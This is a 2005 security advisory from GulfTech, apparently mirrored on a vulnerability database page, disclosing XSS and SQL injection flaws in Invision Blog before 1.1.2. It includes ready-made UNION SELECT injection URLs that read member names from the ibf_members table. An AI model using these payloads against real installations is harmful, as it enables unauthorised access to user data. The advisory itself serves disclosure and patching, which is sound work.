Lucene search
+L

invisionXSSSQL.txt

🗓️ 21 Jun 2005 00:00:00Reported by James BercegayType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 19 Views

Invision Blog software prior to version 1.1.2 Final has multiple security vulnerabilities including SQL Injection and Cross Site Scripting, allowing attackers to access sensitive data and execute hostile code in victim's browser

Code
`##########################################################  
# GulfTech Security Research June 7th, 2005  
##########################################################  
# Vendor : Invision Power Services  
# URL : http://www.invisionblog.com  
# Version : All Versions Prior To 1.1.2 Final  
# Risk : Multiple Vulnerabilities  
##########################################################  
  
  
  
Description:  
Invision Blog is a community based blogging software that can be  
integrated into Invision Power Board. There are several dangerous  
SQL Injection vulnerabilities, as well as a cross site scripting  
vulnerability. These vulnerabilities could allow for an attacker  
to gain access to sensitive data such as password information and  
render hostile script in the context of a victims browser which  
could lead to disclosure of sensitive data such as cookie data.  
  
  
  
Cross Site Scripting:  
There is a cross site scripting issue in Invision Blog that may  
allow for an attacker to render hostile client side code in a  
users browser. The vulnerable function convert_highlite_words()  
doesn't properly sanitize data returned by urldecode() and can be  
taken advantage of by double hex encoding highlight data.  
  
  
  
SQL Injection:  
There are a number of serious SQL Injection vulnerabilities in the  
Invision Blog software. Below are harmless examples that will pull a users  
name from the database.  
  
http://localhost/index.php?automodule=blog&blogid=1&cmd=editentry&eid=99  
%20UNION%20SELECT%201,0,0,name,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_  
members%20WHERE%201/*  
  
http://localhost/index.php?automodule=blog&blogid=1&cmd=replyentry&eid=99  
%20UNION%20SELECT%201,0,0,name,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_  
members%20WHERE%201/*  
  
http://localhost/index.php?automodule=blog&blogid=1&cmd=editcomment&eid=1&  
cid=-99%20UNION%20SELECT%201,0,0,0,0,0,0,0,0,0,0,0,0,name%20FROM%20ibf_  
members%20WHERE%201/*  
  
http://localhost/index.php?automodule=blog&blogid=1&cmd=aboutme&mid=2'  
  
The last example is not very easy to exploit, but can be exploited with  
a bit of effort.  
  
  
  
Solution:  
Updated version of the Invision Blog software have been available for many  
weeks now. Users should upgrade as soon as possible. Special thanks to the  
guys at Invision for fixing these issues so quickly :)  
  
  
  
Related Info:  
The original advisory can be found at the following location  
http://www.gulftech.org/?node=research&article_id=00078-06072005  
  
  
  
Credits:  
James Bercegay of the GulfTech Security Research Team  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation